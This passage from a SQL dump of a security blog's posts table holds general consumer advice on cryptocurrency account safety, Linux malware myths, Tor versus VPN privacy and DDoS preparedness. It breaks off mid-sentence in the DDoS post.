dir=\"ltr\">2. Enable Multi-Factor Authentication (MFA)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Set up MFA for all accounts, adding an extra layer of security. Even if a hacker gains your password, they won’t be able to access your funds without the secondary authentication factor.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Regularly Update Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keep wallets and exchange platforms up to date with the latest security patches to minimize vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Be Aware of Phishing Attacks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Always verify the legitimacy of emails, links, and websites before taking action. Never share your wallet’s private keys, and avoid clicking on suspicious links.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Use Reputable Exchanges</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Stick to well-established exchanges with robust security measures, such as cold wallet storage and advanced threat monitoring.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Conduct Regular Security Audits</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Audit your systems and protocols regularly to identify and address weak points.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Stay Educated</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keep yourself updated on the latest trends, best practices, and common threats in crypto security. Being informed is one of your best defenses.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Closing Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Crypto hacks serve as a stark reminder of the evolving risks in the blockchain space. However, by implementing strong security measures and staying vigilant, individuals and organizations can significantly reduce their vulnerability to attacks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The future of cryptocurrency depends heavily on trust and security. By learning from past breaches, adopting robust measures, and staying informed, we can help secure the digital financial ecosystem and build a safer environment for all users.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:23:46', '2026-01-12 21:41:44', 'History', 'Top Cryptocurrency Hacks: Lessons in Cybersecurity', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(122, 'The Truth About Linux Viruses and How to Protect Your System', 'the-truth-about-linux-viruses-and-how-to-protect-your-system', '# Understanding Linux Security: Myths and Realities\n\nFor years, Linux users have embraced a sense of security, believing their systems were immune or significantly less vulnerable to viruses compared to other operating systems such as Windows. While Linux does offer robust security features, the idea that it is completely virus-free is a **myth**. Recent insights reveal that there are thousands of viruses targeting Linux systems, with over 100 new Linux viruses appearing in just two days.\n\nThis article explores the nature of Linux viruses, how they operate, and whether Linux users need antivirus software. Additionally, we\'ll discuss critical **best practices for securing Linux systems** to help you protect your devices.\n\n## The Prevalence of Linux Viruses\n\nContrary to popular belief, Linux systems are not immune to malware or viruses. While their occurrence might be less frequent compared to platforms like Windows, Linux has become a lucrative target for hackers—especially because the majority of **web servers** operate on this operating system.\n\nOne major area of attack is ransomware. For instance, cybercriminals deploy malicious scripts to gain persistence, escalate privileges, and manipulate files on Linux systems. These attacks highlight how Linux vulnerabilities can be exploited, particularly in environments with improper safeguards.\n\n## Why Linux Users Feel More Secure\n\nDespite the existence of Linux viruses, Linux desktop users often express higher confidence in their system’s security. This sense of security stems from a few distinct reasons:\n\n### 1. Smaller User Base\n\nLinux desktop users make up a relatively smaller share of the market compared to Windows. Hackers typically target platforms with larger user groups to maximize the reach and impact of their malware.\n\n### 2. Package Management Systems\n\nUnlike Windows, Linux users rely heavily on **official repositories** to download and install software. The use of package managers significantly lowers the chances of downloading malware since these repositories are curated and secure.\n\n### 3. Sudo Password Prompts\n\nLinux includes built-in access controls that require users to enter a `sudo` password to execute administrative tasks. This is an important defense layer and contrasts with the habits of many Windows users, who may quickly bypass User Account Control prompts.\n\n### 4. Open-Source Transparency\n\nBecause Linux is open-source, vulnerabilities are often identified and patched by its broad community of developers and users. This increases the likelihood of detecting and mitigating security risks early on.\n\n## Real-World Incidents Highlighting Linux Vulnerabilities\n\nWhile Linux desktops might be less frequently targeted, users are not completely safe. Take the **FreeDownloadManager incident** as an example. The official website was compromised, leading visitors to unknowingly download a malicious version of the software. This resulted in **data theft** for numerous users.\n\nThis incident emphasizes that security depends on more than just the platform—it requires user vigilance, frequent software updates, and proactive monitoring.\n\n## Best Practices for Protecting Linux Systems\n\nYou don’t need to live in fear of malware if you follow these **essential security practices** to protect your Linux systems.\n\n### 1. Stay Current with Updates\n\nAlways keep your Linux distribution and installed applications updated with the latest patches. Updates close potential security loopholes that could be exploited by hackers.\n\n### 2. Follow the Principle of Least Privilege\n\nAssign users only the permissions they absolutely need to perform their tasks. This strategy minimizes potential damage from unauthorized access.\n\n### 3. Utilize Data Encryption\n\nEncrypt your data—whether it’s at rest or in transit—to ensure it\'s accessible only to authorized users. Tools like **LUKS (Linux Unified Key Setup)** make full-disk encryption simple.\n\n### 4. Monitor Network Activity\n\nSecure your network by regularly checking for abnormal activity. Network monitoring tools such as **Wireshark** or **Snort** can detect unusual traffic patterns that may indicate a breach or emerging threat.\n\n### 5. Restrict Unnecessary Software\n\nLimit what you install to only the essential programs and services your system needs. Extra software increases the potential attack surface of your machine.\n\n### 6. Use Strong Authentication Tools\n\nImplement strong, unique passwords, use multi-factor authentication (MFA), and rely on SSH keys when required. These measures offer an additional layer of security.\n\n### 7. Regular Backups\n\nKeep regular backups of your files and system. If a ransomware attack encrypts your data, you can restore files without having to give in to their demands.\n\n## Do Linux Users Need Antivirus Software?\n\nThis question is one of the most debated topics in Linux communities, as the necessity of antivirus software depends largely on how the system is used.\n\nFor most users who stick to official repositories and avoid running untrusted scripts or binaries, antivirus software might seem unnecessary. However, users with **higher threat models** (e.g., handling sensitive data, or frequently interacting with unknown code) may benefit from antivirus solutions like **ClamAV**.\n\n### When to Consider Antivirus on Linux\n\n- You manage Linux servers that handle sensitive customer data.\n- Your system operates in a mixed OS environment with file sharing between Linux and Windows. (Antivirus can detect Windows-based malware that Linux users might inadvertently spread.)\n- You commonly download and run unverified code or binaries.\n\nClamAV, an open-source tool available in the repositories of most Linux distributions, offers real-time file scanning and can protect against a variety of malware threats.\n\n## Emerging Trends and Future Threats\n\nAs Linux grows more popular—particularly in enterprise server environments—the threat landscape evolves. Hackers are increasingly targeting Linux systems with more sophisticated malware. Ransomware that encrypts files **without requiring root privileges** is more prominent, while advanced exploits evade traditional antivirus tools.\n\nThis highlights the importance of **staying ahead of the curve** by keeping track of emerging threats and adopting proactive security measures.\n\n## Key Takeaways\n\nThe myth that Linux systems are virus-free is officially busted. While Linux is inherently a secure operating system, the evolving threat landscape puts every user at some level of risk.\n\nBy adopting the best practices shared in this article, Linux users can greatly reduce their vulnerability to malware. At the same time, understanding when antivirus software is appropriate ensures a balanced approach to staying secure.\n\nRemember, the key to **protecting Linux systems** lies in staying informed, being vigilant, and proactively securing your devices. By doing so, you can enjoy the security benefits of the Linux ecosystem while keeping threats at bay.\n\nProtect your system and safeguard your digital experience. Together, we can keep Linux secure.', '', 'http://infoseclabs.io/uploads/1773164030829-414018755.jpg', 'Illustration of a Linux system with a shield icon symbolizing protection against viruses', 1, 'published', '2026-03-09 20:22:00', '2026-03-10 20:33:53', 'Information Security', 'Linux Viruses: Protect Your System Effectively', 'Discover the truth about Linux viruses and learn essential protection tips for keeping your system secure.', 'Linux viruses'),
(123, 'Enhancing Online Privacy: Choosing Between Tor and VPN', 'enhancing-online-privacy-choosing-between-tor-and-vpn', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Internet has become an integral part of our daily activities. Whether you\'re browsing for information, shopping online, downloading files, or chatting with friends, your internet service provider (ISP) plays a central role in connecting you to the digital world. But how much of your activity can your ISP really monitor? Understanding this is key to maintaining your privacy and enhancing network security.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This detailed blog will break down what your ISP can and cannot see during common online activities, provide tips for secure browsing, and explain how tools like VPNs and Tor can protect your internet data.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Can Your ISP See What You Do Online?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When discussing the extent of ISP visibility into your online activities, the answer depends on the type of connection (HTTP vs. HTTPS) and the tools you use.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Browsing the Internet</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When searching for something online, like using Google to look up health information, your ISP cannot see your search queries or results. What your ISP <b><strong class=\"font-bold\">can</strong></b> see is that you\'re connected to Google. If you click on a specific website, for instance, a hospital\'s blog, your ISP knows you\'re connected to that website but not the specific blog post you\'re reading.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Why? This all comes down to the <b><strong class=\"font-bold\">Domain Name System (DNS)</strong></b> and encryption protocols.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">DNS Explained</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you access a website, your computer queries a DNS server to retrieve the website\'s IP address. This request is unencrypted, so your ISP can see which domains you\'re visiting, such as “examplehospital.com.”</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">HTTPS Protects Your Data</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you use websites that are secured with HTTPS, the information exchanged between you and the website is encrypted. This means your ISP cannot track which specific pages you visit or what content you view on those pages. With HTTP (unencrypted sites), however, all your content and actions can be monitored by your ISP.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip</strong></b>: Always pay attention to your browser warnings about unencrypted HTTP websites—they pose significant security risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Using Torrents and Downloading Files</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When downloading content, the level of visibility your ISP has largely depends on the protocol used.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Direct Downloads via HTTPS</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you download a file via HTTPS, your ISP knows you downloaded something from the file-sharing platform, but it cannot see the file\'s contents. Using HTTPS ensures a layer of encryption that safeguards your data.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Downloading Torrents</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With torrents, your ISP has more visibility. It can identify the specific torrent file downloaded and even access the file by downloading it themselves. While ISPs may not see the file\'s content directly, the lack of encryption makes torrenting more exposed.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To safeguard your activities, a Virtual Private Network (VPN) hides your IP and encrypts the data you exchange.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Online Shopping</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When shopping online, your ISP knows you\'re connected to a shopping platform like Amazon or eBay. However, due to HTTPS encryption on these websites, your overall shopping activity—like your purchases—remains private.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Emails and Messaging Apps</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Thankfully, emails and popular messaging apps like WhatsApp and Telegram use encryption to safeguard your communication. If you\'re sending emails through Gmail or accessing WhatsApp, your ISP can only see you\'re connected to the platform but cannot view your messages.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For emails sent via email clients like Thunderbird, encryption is handled in the background, protecting your sensitive information.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tools to Protect Your Privacy</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Enhancing your privacy on the internet requires adopting the right tools and practices to reduce your ISP’s ability to monitor your activities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use a Virtual Private Network (VPN)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A VPN encrypts all your internet traffic and routes it through a third-party server. This means your ISP can only see that you\'re connected to the VPN, but not the content of your internet activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Things to Keep in Mind</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Choose a reputable VPN provider. Free VPNs might compromise your privacy by selling your data to third parties.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">A VPN is ideal for tasks like browsing securely, streaming, or downloading torrents.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Try Tor (The Onion Router)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For advanced anonymity, Tor sends your data through multiple volunteer-operated servers, ensuring no single server knows both your IP address and the website you’re visiting.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features of Tor</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Your internet activity passes through three computers (nodes). The first node sees your IP address, the middle node forwards encrypted data, and the final node knows only the destination website.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Ideal for accessing specific websites anonymously.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Note</em></i>: Avoid using Tor for activities like logging into personal accounts to ensure anonymity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tor vs. VPN - Which Should You Use?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The right solution depends on your unique privacy needs.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">VPN</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Best for secure browsing, streaming, and downloading torrents.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Provides faster speeds compared to Tor.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Allows users to hide their browsing activities from ISPs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Tor</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Ideal for anonymity, especially when accessing specific websites without revealing your IP.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">A great option for journalists, activists, or anyone navigating environments requiring high privacy.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both tools offer benefits, so choose based on the level of security and speed you need.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Tips for Secure Browsing</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To further enhance your internet security and privacy, consider these cybersecurity tips:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use HTTPS websites whenever possible. A quick way to identify secure websites is by looking for a padlock icon in the browser address bar.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enable DNS-over-HTTPS (DoH) in your browser to encrypt DNS requests.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly update your browser and firewall for added protection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Avoid public Wi-Fi networks unless you’re using a VPN.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Take Charge of Your Data Privacy</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding what your ISP can see and adopting effective tools to safeguard your online presence is essential in this digital age. From encrypted browsing to secure file downloads, incorporating VPNs and Tor into your cybersecurity strategy can go a long way in ensuring privacy.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start today by making these changes to protect your online identity. Empower yourself with the knowledge and tools that put you in control of your digital information. For more advanced cybersecurity tips, explore our blog and learn how to maximize your privacy!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:20:01', '2026-01-12 21:41:44', 'Information Security', 'Enhancing Online Privacy: Choosing Between Tor and VPN', '', NULL),
(124, 'DDoS Attacks! How to Stay Protected', 'ddos-attacks-how-to-stay-protected', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A Distributed Denial of Service (DDoS) attack is one of the most common and disruptive cyber threats your business can face. These attacks essentially flood your website with junk traffic, overwhelming your servers and making your website inaccessible to legitimate visitors. For any business, a downed website means lost revenue, damaged reputation, and frustrated customers.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The good news? With the right preparation and response strategy, you can mitigate the damage of a DDoS attack and keep your website running smoothly. This blog will explore detailed steps to safeguard your digital presence.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">What is a DDoS Attack?</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding what a DDoS attack is and how it works is the first step in protecting your website. A DDoS attack overwhelms your website\'s resources, such as bandwidth and server capacity, by sending a massive amount of fake traffic all at once. This traffic overload prevents real users from accessing your website, crippling your online operations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These attacks can be motivated by financial gain, personal grudges, or even competition. Regardless of the reason, protecting your online assets with strong <b><strong class=\"font-bold\">cybersecurity tools</strong></b> is critical.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">5 Steps to Effectively Handle DDoS Attacks</strong></b></h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Build Cybersecurity Awareness Among Your Team</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think of cybersecurity like protecting your home; you wouldn\'t leave the doors wide open, would you? Similarly, your website needs strong defenses. To start, educate yourself and your team about DDoS attacks, how they work, and their warning signs. Slow loading times, sudden error messages, or a massive (and unexpected) traffic spike are often signs of an attack.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The more your team understands these potential threats, the faster you can react. Equipping your team with knowledge and basic <b><strong class=\"font-bold\">cybersecurity tips</strong></b> is your first line of defense.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Create a DDoS Response Strategy</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Preparation is key. Much like having a fire escape plan at home, your business should have a response strategy for a DDoS attack.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how to design your strategy:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Assign roles and responsibilities. Who will communicate with customers, and who will handle technical solutions?</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Include contact information for your internet service provider and any relevant cybersecurity services.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Make a checklist for immediate actions, such as identifying the attack type, configuring filters, and contacting necessary service providers.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Having this plan in place reduces panic and ensures a more organized response in the event of an attack.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Communicate Transparently During an Attack</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When your website is hit by a DDoS attack, clear communication with all stakeholders is essential. Notify your customers, partners, and employees about the situation as soon as possible. Explain what a DDoS attack is and assure them you are actively working on a solution.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Open communication builds trust and ensures stakeholders remain patient. Use clear updates to avoid confusion and keep everyone informed about the restoration timeline. No one likes feeling left in the dark.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Use Cybersecurity Tools to Mitigate the Attack</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While your team stays calm, your IT experts should focus on responding effectively. Using <b><strong class=\"font-bold\">network security</strong></b> tools like firewalls and DDoS protection services can help filter out unwanted traffic and limit the impact of the attack. Here are some tools and services to 